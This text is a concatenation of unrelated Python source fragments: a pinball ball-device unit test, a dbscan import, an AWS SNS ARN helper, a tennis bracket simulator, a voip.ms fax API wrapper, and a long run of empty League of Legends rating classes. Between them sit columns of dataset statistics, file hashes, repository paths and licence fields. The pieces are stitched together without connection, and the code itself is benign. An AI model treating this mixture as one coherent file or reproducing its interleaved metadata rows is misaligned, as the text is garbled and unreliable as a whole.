# soft pulse
self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.advance_time_and_run(.1)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.assertEqual(self.machine.ball_devices.trough.balls, 3)
self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
assert not self.plunger_coil.pulse.called
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
# player hits the launch button
self.machine.switch_controller.process_switch('s_launch', 1)
self.machine.switch_controller.process_switch('s_launch', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_plunger', 0)
self.advance_time_and_run(1)
# ball moves from plunger lane to playfield
self.machine.switch_controller.process_switch('s_playfield', 1)
self.machine.switch_controller.process_switch('s_playfield', 0)
self.advance_time_and_run(.1)
self.plunger_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.assertEqual(self.machine.ball_devices.trough.balls, 3)
self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
self.assertEqual(self.machine.ball_devices.playfield.balls, 1)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("idle", self.machine.ball_devices.plunger._state)
self.assertEqual(4, self.machine.ball_controller.num_balls_known)
self.assertEqual(0, self._captured)
# request second ball
self.machine.playfield.add_ball(player_controlled=True)
self.advance_time_and_run(1)
# soft pulse
self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.advance_time_and_run(.1)
# ball goes missing for some time
self.advance_time_and_run(10)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
self.assertEqual(self.machine.ball_devices.trough.balls, 2)
self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
self.assertEqual(self.machine.ball_devices.playfield.balls, 1)
self.assertEqual(4, self.machine.ball_controller.num_balls_known)
self.assertEqual(0, self._captured)
| 47.052174
| 101
| 0.721894
| 4,466
| 32,466
| 4.926332
| 0.041424
| 0.141994
| 0.131358
| 0.208627
| 0.930412
| 0.923231
| 0.915958
| 0.913913
| 0.903868
| 0.903868
| 0
| 0.017437
| 0.180373
| 32,466
| 689
| 102
| 47.120464
| 0.809357
| 0.080546
| 0
| 0.911579
| 0
| 0
| 0.069761
| 0.005408
| 0
| 0
| 0
| 0
| 0.307368
| 1
| 0.029474
| false
| 0
| 0.004211
| 0.002105
| 0.046316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dc3af614f4907fadf920f8ffb552253219621b05
| 41
|
py
|
Python
|
utils/dpbench_python/dbscan/__init__.py
|
geexie/dpbench
|
7d41409ded3c816f35003bc5aea071852bceb892
|
[
"BSD-2-Clause"
] | 8
|
2021-03-26T15:17:58.000Z
|
2022-01-21T21:56:19.000Z
|
utils/dpbench_python/dbscan/__init__.py
|
geexie/dpbench
|
7d41409ded3c816f35003bc5aea071852bceb892
|
[
"BSD-2-Clause"
] | 22
|
2021-03-30T21:20:57.000Z
|
2022-02-22T13:42:17.000Z
|
utils/dpbench_python/dbscan/__init__.py
|
geexie/dpbench
|
7d41409ded3c816f35003bc5aea071852bceb892
|
[
"BSD-2-Clause"
] | 7
|
2021-03-23T11:00:43.000Z
|
2022-02-02T12:28:55.000Z
|
from .dbscan_python import dbscan_python
| 20.5
| 40
| 0.878049
| 6
| 41
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 41
| 1
| 41
| 41
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dc43d8b25f10994b6ffa3ff6aafc73d85725f96a
| 91
|
py
|
Python
|
aws/sns.py
|
nathants/cli-aws
|
4e1b12099ede0afe016f8d7b655f05cb9d5c1251
|
[
"MIT"
] | 2
|
2019-10-25T19:39:55.000Z
|
2022-02-03T01:15:02.000Z
|
aws/sns.py
|
nathants/cli-aws
|
4e1b12099ede0afe016f8d7b655f05cb9d5c1251
|
[
"MIT"
] | null | null | null |
aws/sns.py
|
nathants/cli-aws
|
4e1b12099ede0afe016f8d7b655f05cb9d5c1251
|
[
"MIT"
] | null | null | null |
import aws
def arn(name):
return f'arn:aws:sns:{aws.region()}:{aws.account()}:{name}'
| 18.2
| 63
| 0.637363
| 15
| 91
| 3.866667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120879
| 91
| 4
| 64
| 22.75
| 0.725
| 0
| 0
| 0
| 0
| 0
| 0.538462
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
dc67c16a9675c8484cb1c2a6c52dec2a93aad3af
| 5,319
|
py
|
Python
|
pybracket/basicBrackets.py
|
tennis-aa/tennis-bracket
|
02133ac98979ced7b8f47eeaa89ed1817cc0d802
|
[
"MIT"
] | null | null | null |
pybracket/basicBrackets.py
|
tennis-aa/tennis-bracket
|
02133ac98979ced7b8f47eeaa89ed1817cc0d802
|
[
"MIT"
] | null | null | null |
pybracket/basicBrackets.py
|
tennis-aa/tennis-bracket
|
02133ac98979ced7b8f47eeaa89ed1817cc0d802
|
[
"MIT"
] | null | null | null |
from random import random
import math
def generateMonkeys(players,n):
# helper variables
bracketSize = len(players)
rounds = math.log(bracketSize,2)
if not rounds.is_integer():
raise ValueError("bracketSize has to be 2^n")
rounds = int(rounds)
counter = [0]*(rounds+1)
for j in range(rounds):
counter[j+1] = counter[j] + int(bracketSize/(2**j))
# generate random brackets
monkeys = {}
for k in range(n):
bracket = []
for i in range(int(bracketSize/2)):
if players[2*i]=="Bye":
bracket.append(players[2*i+1])
elif players[2*i+1]=="Bye":
bracket.append(players[2*i])
elif random() < 0.5:
bracket.append(players[2*i])
else:
bracket.append(players[2*i+1])
for j in range(1,rounds):
for i in range(int(bracketSize/(2**(j+1)))):
if random()<0.5:
bracket.append(bracket[counter[j]-bracketSize+2*i])
else:
bracket.append(bracket[counter[j]-bracketSize+2*i+1])
monkeys["monkey"+str(k)] = bracket
return monkeys
def generateBots(players,elo,n,sets=3):
# helper variables
bracketSize = len(players)
rounds = math.log(bracketSize,2)
if not rounds.is_integer():
raise ValueError("bracketSize has to be 2^n")
rounds = int(rounds)
counter = [0]*(rounds+1)
for j in range(rounds):
counter[j+1] = counter[j] + int(bracketSize/(2**j))
# generate brackets based on probabilities from elo
bots = {}
for k in range(n):
bracket = []
bracket_elo = []
for i in range(int(bracketSize/2)):
if players[2*i]=="Bye":
bracket.append(players[2*i+1])
bracket_elo.append(elo[2*i+1])
continue
elif players[2*i+1]=="Bye":
bracket.append(players[2*i])
bracket_elo.append(elo[2*i])
continue
Q1 = 10**(elo[2*i]/400)
Q2 = 10**(elo[2*i+1]/400)
probability = Q1/(Q1+Q2)
if sets == 5:
probability = fiveodds(probability)
if random() < probability:
bracket.append(players[2*i])
bracket_elo.append(elo[2*i])
else:
bracket.append(players[2*i+1])
bracket_elo.append(elo[2*i+1])
for j in range(1,rounds):
for i in range(int(bracketSize/(2**(j+1)))):
Q1 = 10**(bracket_elo[counter[j]-bracketSize+2*i]/400)
Q2 = 10**(bracket_elo[counter[j]-bracketSize+2*i+1]/400)
probability = Q1/(Q1+Q2)
if sets == 5:
probability = fiveodds(probability)
if random() < probability:
bracket.append(bracket[counter[j]-bracketSize+2*i])
bracket_elo.append(bracket_elo[counter[j]-bracketSize+2*i])
else:
bracket.append(bracket[counter[j]-bracketSize+2*i+1])
bracket_elo.append(bracket_elo[counter[j]-bracketSize+2*i+1])
bots["bot"+str(k)] = bracket
return bots
def generateElo(players,elo):
# helper variables
bracketSize = len(players)
rounds = math.log(bracketSize,2)
if not rounds.is_integer():
raise ValueError("bracketSize has to be 2^n")
rounds = int(rounds)
counter = [0]*(rounds+1)
for j in range(rounds):
counter[j+1] = counter[j] + int(bracketSize/(2**j))
# generate brackets based on probabilities from elo
bracket = []
bracket_elo = []
for i in range(int(bracketSize/2)):
if players[2*i]=="Bye":
bracket.append(players[2*i+1])
bracket_elo.append(elo[2*i+1])
continue
elif players[2*i+1]=="Bye":
bracket.append(players[2*i])
bracket_elo.append(elo[2*i])
continue
if elo[2*i]>elo[2*i+1]:
bracket.append(players[2*i])
bracket_elo.append(elo[2*i])
else:
bracket.append(players[2*i+1])
bracket_elo.append(elo[2*i+1])
for j in range(1,rounds):
for i in range(int(bracketSize/(2**(j+1)))):
if bracket_elo[counter[j]-bracketSize+2*i]>bracket_elo[counter[j]-bracketSize+2*i+1]:
bracket.append(bracket[counter[j]-bracketSize+2*i])
bracket_elo.append(bracket_elo[counter[j]-bracketSize+2*i])
else:
bracket.append(bracket[counter[j]-bracketSize+2*i+1])
bracket_elo.append(bracket_elo[counter[j]-bracketSize+2*i+1])
Elo = {}
Elo["Elo"] = bracket
return Elo
# The following function computes the probability of winning a 5 set match given the probability of winning a 3 set match.
# The elo ratings used in this package are for 3 set matches. A conversion is necessary for 5 set matches.
# This function was taken from https://github.com/JeffSackmann/tennis_misc/blob/master/fiveSetProb.py
import numpy
def fiveodds(p3):
p1 = numpy.roots([-2, 3, 0, -1*p3])[1]
p5 = (p1**3)*(4 - 3*p1 + (6*(1-p1)*(1-p1)))
return p5
| 35.46
| 122
| 0.550291
| 704
| 5,319
| 4.120739
| 0.142045
| 0.030334
| 0.022751
| 0.096518
| 0.814547
| 0.779731
| 0.769045
| 0.758359
| 0.718373
| 0.709411
| 0
| 0.04292
| 0.312277
| 5,319
| 150
| 123
| 35.46
| 0.750137
| 0.094191
| 0
| 0.77686
| 1
| 0
| 0.021834
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033058
| false
| 0
| 0.024793
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dcae86607b952b08c89fc14669ca4312acc97738
| 15,720
|
py
|
Python
|
voipms/entities/faxset.py
|
4doom4/python-voipms
|
3159ccfaf1ed9f5fef431fa3d2fdd54b9d3b1b3c
|
[
"MIT"
] | 14
|
2017-06-26T16:22:59.000Z
|
2022-03-10T13:22:49.000Z
|
voipms/entities/faxset.py
|
judahpaul16/python-voipms
|
4e1eb51f927b9e0924091f7bbf25ccc2193c3bac
|
[
"MIT"
] | 8
|
2018-02-15T18:25:48.000Z
|
2022-03-29T06:17:00.000Z
|
voipms/entities/faxset.py
|
judahpaul16/python-voipms
|
4e1eb51f927b9e0924091f7bbf25ccc2193c3bac
|
[
"MIT"
] | 8
|
2019-02-22T00:42:25.000Z
|
2022-02-14T19:50:41.000Z
|
# coding=utf-8
"""
The Fax API endpoint set
Documentation: https://voip.ms/m/apidocs.php
"""
from voipms.baseapi import BaseApi
from voipms.helpers import convert_bool, validate_email
class FaxSet(BaseApi):
"""
Set for the Fax endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(FaxSet, self).__init__(*args, **kwargs)
self.endpoint = 'fax'
def fax_folder(self, name, **kwargs):
"""
Create or update the information of a specific Fax Folder
:param name: [Required] Name of the Fax Folder to create or update (Example: FAMILY)
:type name: :py:class:`int`
:param fax_id: ID of the Fax Folder to edit (Values from fax.get_fax_folders)
:type fax_id: :py:class:`int`
:param test: Set to true if testing how cancel a Fax Folder (True/False)
:type test: :py:class:`bool`
:returns: :py:class:`dict`
"""
method = "setFaxFolder"
if not isinstance(name, str):
raise ValueError("Name of the Fax Folder to create or update needs to be a str (Example: FAMILY)")
parameters = {
"name": name,
}
if "fax_id" in kwargs:
if not isinstance(kwargs["fax_id"], int):
raise ValueError("ID of the Fax Folder to edit needs to be an int (Values from fax.get_fax_folders)")
parameters["id"] = kwargs.pop("fax_id")
if "test" in kwargs:
if not isinstance(kwargs["test"], bool):
raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
else:
parameters["test"] = convert_bool(kwargs.pop("test"))
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
def email_to_fax(self, auth_email, from_number_id, security_code, **kwargs):
"""
eate or update the information of a specific "Email to Fax configuration"
:param auth_email: [Required] Email address from you will sent Fax Messages
:type auth_email: :py:class:`str`
:param from_number_id: [Required] Fax number that will appear as fax sender. (values from fax.get_fax_numbers_info)
:type from_number_id: :py:class:`int`
:param security_code: [Required] An alphanumeric code to identify your emails before send as Fax
:type security_code: :py:class:`str`
:param fax_id: ID of the "Email to Fax" to edit (Values from fax.get_email_to_fax)
:type fax_id: :py:class:`int`
:param enabled: If Enable, we will send Fax Message when we receive an email from the provided address (True/False)
:type enabled: :py:class:`bool`
:param security_code_enabled: If Enable, we will check the mail subject if this include a Security Code before send the Fax (True/False)
:type security_code_enabled: :py:class:`bool`
:param test: Set to true if testing how cancel a Fax Folder (True/False)
:type test: :py:class:`bool`
:returns: :py:class:`dict`
"""
method = "setEmailToFax"
if not isinstance(auth_email, str):
raise ValueError("Email address from you will sent Fax Messages needs to be a str")
elif not validate_email(auth_email):
raise ValueError("Email address from you will sent Fax Messages is not a correct email syntax")
if not isinstance(from_number_id, int):
raise ValueError("Fax number that will appear as fax sender needs to be an int (values from fax.get_fax_numbers_info)")
if not isinstance(security_code, str):
raise ValueError("An alphanumeric code to identify your emails before send as Fax needs to be a str")
parameters = {
"auth_email": auth_email,
"from_number_id": from_number_id,
"security_code": security_code,
}
if "fax_id" in kwargs:
if not isinstance(kwargs["fax_id"], int):
raise ValueError("ID of the \"Email to Fax\" to edit (Values from fax.get_fax_folders)")
parameters["id"] = kwargs.pop("fax_id")
if "enabled" in kwargs:
if not isinstance(kwargs["enabled"], bool):
raise ValueError("If Enable, we will send Fax Message when we receive an email from the provided address needs to be a bool (True/False)")
else:
parameters["enabled"] = convert_bool(kwargs.pop("enabled"))
if "security_code_enabled" in kwargs:
if not isinstance(kwargs["security_code_enabled"], bool):
raise ValueError("If Enable, we will check the mail subject if this include a Security Code before send the Fax needs to be a bool (True/False)")
else:
parameters["security_code_enabled"] = convert_bool(kwargs.pop("security_code_enabled"))
if "test" in kwargs:
if not isinstance(kwargs["test"], bool):
raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
else:
parameters["test"] = convert_bool(kwargs.pop("test"))
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
def fax_number_info(self, did, **kwargs):
"""
Updates the information from a specific Fax Number
:param did: [Required] DID Number to be ported into our network (Example: 5552341234)
:type did: :py:class:`int`
:param email: Email address where send notifications when receive Fax Messages (Example: yourname@company.com)
:type email: :py:class:`str`
:param email_enable: Flag to enable the email notifications (True/False default False)
:type email_enable: :py:class:`bool`
:param email_attach_file: Flag to enable attach the Fax Message as a PDF file in the notifications (True/False default False)
:type email_attach_file: :py:class:`bool`
:param url_callback: URL where make a POST when you receive a Fax Message
:type url_callback: :py:class:`str`
:param url_callback_enable: Flag to enable the URL Callback functionality (True/False default False)
:type url_callback_enable: :py:class:`bool`
:param url_callback_retry: Flag to enable retry the POST action in case we don't receive "ok" (True/False default False)
:type url_callback_retry: :py:class:`bool`
:param test: Set to true if testing how cancel a Fax Folder (True/False)
:type test: :py:class:`bool`
:returns: :py:class:`dict`
"""
method = "setFaxNumberInfo"
if not isinstance(did, int):
raise ValueError("DID Number to be ported into our network needs to be an int (Example: 5552341234)")
parameters = {
"did": did,
}
if "email" in kwargs:
email = kwargs.pop("email")
if not isinstance(email, str):
raise ValueError("Email address where send notifications when receive Fax Messages needs to be a str (Example: yourname@company.com)")
elif not validate_email(email):
raise ValueError("Email address where send notifications when receive Fax Messages is not a correct email syntax")
parameters["email"] = email
if "email_enabled" in kwargs:
if not isinstance(kwargs["email_enabled"], bool):
raise ValueError("Flag to enable the email notifications needs to be a bool (True/False default False)")
parameters["email_enabled"] = convert_bool(kwargs.pop("email_enabled"))
if "email_attach_file" in kwargs:
if not isinstance(kwargs["email_attach_file"], bool):
raise ValueError("Flag to enable attach the Fax Message as a PDF file in the notifications needs to be a bool (True/False default False)")
parameters["email_attach_file"] = convert_bool(kwargs.pop("email_attach_file"))
if "url_callback" in kwargs:
if not isinstance(kwargs["url_callback"], str):
raise ValueError("URL where make a POST when you receive a Fax Message needs to be a str")
parameters["url_callback"] = convert_bool(kwargs.pop("url_callback"))
if "url_callback_enable" in kwargs:
if not isinstance(kwargs["url_callback_enable"], bool):
raise ValueError("Flag to enable the URL Callback functionality needs to be a bool (True/False default False)")
parameters["url_callback_enable"] = convert_bool(kwargs.pop("url_callback_enable"))
if "url_callback_retry" in kwargs:
if not isinstance(kwargs["url_callback_retry"], bool):
raise ValueError("Flag to enable retry the POST action in case we don't receive \"ok\" (True/False default False)")
parameters["url_callback_retry"] = convert_bool(kwargs.pop("url_callback_retry"))
if "test" in kwargs:
if not isinstance(kwargs["test"], bool):
raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
else:
parameters["test"] = convert_bool(kwargs.pop("test"))
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
def fax_number_email(self, did, **kwargs):
"""
Updates the email configuration from a specific Fax Number
:param did: [Required] DID Number to be ported into our network (Example: 5552341234)
:type did: :py:class:`int`
:param email: Email address where send notifications when receive Fax Messages (Example: yourname@company.com)
:type email: :py:class:`str`
:param email_enable: Flag to enable the email notifications (True/False default False)
:type email_enable: :py:class:`bool`
:param email_attach_file: Flag to enable attach the Fax Message as a PDF file in the notifications (True/False default False)
:type email_attach_file: :py:class:`bool`
:param test: Set to true if testing how cancel a Fax Folder (True/False)
:type test: :py:class:`bool`
:returns: :py:class:`dict`
"""
method = "setFaxNumberEmail"
if not isinstance(did, int):
raise ValueError("DID Number to be ported into our network needs to be an int (Example: 5552341234)")
parameters = {
"did": did,
}
if "email" in kwargs:
email = kwargs.pop("email")
if not isinstance(email, str):
raise ValueError("Email address where send notifications when receive Fax Messages needs to be a str (Example: yourname@company.com)")
elif not validate_email(email):
raise ValueError("Email address where send notifications when receive Fax Messages is not a correct email syntax")
parameters["email"] = email
if "email_enabled" in kwargs:
if not isinstance(kwargs["email_enabled"], bool):
raise ValueError("Flag to enable the email notifications needs to be a bool (True/False default False)")
parameters["email_enabled"] = convert_bool(kwargs.pop("email_enabled"))
if "email_attach_file" in kwargs:
if not isinstance(kwargs["email_attach_file"], bool):
raise ValueError("Flag to enable attach the Fax Message as a PDF file in the notifications needs to be a bool (True/False default False)")
parameters["email_attach_file"] = convert_bool(kwargs.pop("email_attach_file"))
if "test" in kwargs:
if not isinstance(kwargs["test"], bool):
raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
else:
parameters["test"] = convert_bool(kwargs.pop("test"))
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
def fax_number_url_callback(self, did, **kwargs):
"""
Updates the url callback configuration from a specific Fax Number
:param did: [Required] DID Number to be ported into our network (Example: 5552341234)
:type did: :py:class:`int`
:param url_callback: URL where make a POST when you receive a Fax Message
:type url_callback: :py:class:`str`
:param url_callback_enable: Flag to enable the URL Callback functionality (True/False default False)
:type url_callback_enable: :py:class:`bool`
:param url_callback_retry: Flag to enable retry the POST action in case we don't receive "ok" (True/False default False)
:type url_callback_retry: :py:class:`bool`
:param test: Set to true if testing how cancel a Fax Folder (True/False)
:type test: :py:class:`bool`
:returns: :py:class:`dict`
"""
method = "setFaxNumberURLCallback"
if not isinstance(did, int):
raise ValueError("DID Number to be ported into our network needs to be an int (Example: 5552341234)")
parameters = {
"did": did,
}
if "url_callback" in kwargs:
if not isinstance(kwargs["url_callback"], str):
raise ValueError("URL where make a POST when you receive a Fax Message needs to be a str")
parameters["url_callback"] = convert_bool(kwargs.pop("url_callback"))
if "url_callback_enable" in kwargs:
if not isinstance(kwargs["url_callback_enable"], bool):
raise ValueError("Flag to enable the URL Callback functionality needs to be a bool (True/False default False)")
parameters["url_callback_enable"] = convert_bool(kwargs.pop("url_callback_enable"))
if "url_callback_retry" in kwargs:
if not isinstance(kwargs["url_callback_retry"], bool):
raise ValueError("Flag to enable retry the POST action in case we don't receive \"ok\" (True/False default False)")
parameters["url_callback_retry"] = convert_bool(kwargs.pop("url_callback_retry"))
if "test" in kwargs:
if not isinstance(kwargs["test"], bool):
raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
else:
parameters["test"] = convert_bool(kwargs.pop("test"))
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
| 47.636364
| 161
| 0.635878
| 2,063
| 15,720
| 4.727581
| 0.077072
| 0.04737
| 0.043064
| 0.020507
| 0.899621
| 0.870194
| 0.862914
| 0.83564
| 0.813698
| 0.799139
| 0
| 0.00576
| 0.27112
| 15,720
| 329
| 162
| 47.781155
| 0.845436
| 0.267557
| 0
| 0.744318
| 0
| 0.034091
| 0.358122
| 0.016015
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034091
| false
| 0
| 0.011364
| 0
| 0.079545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dcb88ef95e1251ca0dd7d1d40d231be6efb26094
| 6,407
|
py
|
Python
|
loldib/getratings/models/NA/na_varus/na_varus_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_varus/na_varus_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_varus/na_varus_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Varus_Bot_Aatrox(Ratings):
pass
class NA_Varus_Bot_Ahri(Ratings):
pass
class NA_Varus_Bot_Akali(Ratings):
pass
class NA_Varus_Bot_Alistar(Ratings):
pass
class NA_Varus_Bot_Amumu(Ratings):
pass
class NA_Varus_Bot_Anivia(Ratings):
pass
class NA_Varus_Bot_Annie(Ratings):
pass
class NA_Varus_Bot_Ashe(Ratings):
pass
class NA_Varus_Bot_AurelionSol(Ratings):
pass
class NA_Varus_Bot_Azir(Ratings):
pass
class NA_Varus_Bot_Bard(Ratings):
pass
class NA_Varus_Bot_Blitzcrank(Ratings):
pass
class NA_Varus_Bot_Brand(Ratings):
pass
class NA_Varus_Bot_Braum(Ratings):
pass
class NA_Varus_Bot_Caitlyn(Ratings):
pass
class NA_Varus_Bot_Camille(Ratings):
pass
class NA_Varus_Bot_Cassiopeia(Ratings):
pass
class NA_Varus_Bot_Chogath(Ratings):
pass
class NA_Varus_Bot_Corki(Ratings):
pass
class NA_Varus_Bot_Darius(Ratings):
pass
class NA_Varus_Bot_Diana(Ratings):
pass
class NA_Varus_Bot_Draven(Ratings):
pass
class NA_Varus_Bot_DrMundo(Ratings):
pass
class NA_Varus_Bot_Ekko(Ratings):
pass
class NA_Varus_Bot_Elise(Ratings):
pass
class NA_Varus_Bot_Evelynn(Ratings):
pass
class NA_Varus_Bot_Ezreal(Ratings):
pass
class NA_Varus_Bot_Fiddlesticks(Ratings):
pass
class NA_Varus_Bot_Fiora(Ratings):
pass
class NA_Varus_Bot_Fizz(Ratings):
pass
class NA_Varus_Bot_Galio(Ratings):
pass
class NA_Varus_Bot_Gangplank(Ratings):
pass
class NA_Varus_Bot_Garen(Ratings):
pass
class NA_Varus_Bot_Gnar(Ratings):
pass
class NA_Varus_Bot_Gragas(Ratings):
pass
class NA_Varus_Bot_Graves(Ratings):
pass
class NA_Varus_Bot_Hecarim(Ratings):
pass
class NA_Varus_Bot_Heimerdinger(Ratings):
pass
class NA_Varus_Bot_Illaoi(Ratings):
pass
class NA_Varus_Bot_Irelia(Ratings):
pass
class NA_Varus_Bot_Ivern(Ratings):
pass
class NA_Varus_Bot_Janna(Ratings):
pass
class NA_Varus_Bot_JarvanIV(Ratings):
pass
class NA_Varus_Bot_Jax(Ratings):
pass
class NA_Varus_Bot_Jayce(Ratings):
pass
class NA_Varus_Bot_Jhin(Ratings):
pass
class NA_Varus_Bot_Jinx(Ratings):
pass
class NA_Varus_Bot_Kalista(Ratings):
pass
class NA_Varus_Bot_Karma(Ratings):
pass
class NA_Varus_Bot_Karthus(Ratings):
pass
class NA_Varus_Bot_Kassadin(Ratings):
pass
class NA_Varus_Bot_Katarina(Ratings):
pass
class NA_Varus_Bot_Kayle(Ratings):
pass
class NA_Varus_Bot_Kayn(Ratings):
pass
class NA_Varus_Bot_Kennen(Ratings):
pass
class NA_Varus_Bot_Khazix(Ratings):
pass
class NA_Varus_Bot_Kindred(Ratings):
pass
class NA_Varus_Bot_Kled(Ratings):
pass
class NA_Varus_Bot_KogMaw(Ratings):
pass
class NA_Varus_Bot_Leblanc(Ratings):
pass
class NA_Varus_Bot_LeeSin(Ratings):
pass
class NA_Varus_Bot_Leona(Ratings):
pass
class NA_Varus_Bot_Lissandra(Ratings):
pass
class NA_Varus_Bot_Lucian(Ratings):
pass
class NA_Varus_Bot_Lulu(Ratings):
pass
class NA_Varus_Bot_Lux(Ratings):
pass
class NA_Varus_Bot_Malphite(Ratings):
pass
class NA_Varus_Bot_Malzahar(Ratings):
pass
class NA_Varus_Bot_Maokai(Ratings):
pass
class NA_Varus_Bot_MasterYi(Ratings):
pass
class NA_Varus_Bot_MissFortune(Ratings):
pass
class NA_Varus_Bot_MonkeyKing(Ratings):
pass
class NA_Varus_Bot_Mordekaiser(Ratings):
pass
class NA_Varus_Bot_Morgana(Ratings):
pass
class NA_Varus_Bot_Nami(Ratings):
pass
class NA_Varus_Bot_Nasus(Ratings):
pass
class NA_Varus_Bot_Nautilus(Ratings):
pass
class NA_Varus_Bot_Nidalee(Ratings):
pass
class NA_Varus_Bot_Nocturne(Ratings):
pass
class NA_Varus_Bot_Nunu(Ratings):
pass
class NA_Varus_Bot_Olaf(Ratings):
pass
class NA_Varus_Bot_Orianna(Ratings):
pass
class NA_Varus_Bot_Ornn(Ratings):
pass
class NA_Varus_Bot_Pantheon(Ratings):
pass
class NA_Varus_Bot_Poppy(Ratings):
pass
class NA_Varus_Bot_Quinn(Ratings):
pass
class NA_Varus_Bot_Rakan(Ratings):
pass
class NA_Varus_Bot_Rammus(Ratings):
pass
class NA_Varus_Bot_RekSai(Ratings):
pass
class NA_Varus_Bot_Renekton(Ratings):
pass
class NA_Varus_Bot_Rengar(Ratings):
pass
class NA_Varus_Bot_Riven(Ratings):
pass
class NA_Varus_Bot_Rumble(Ratings):
pass
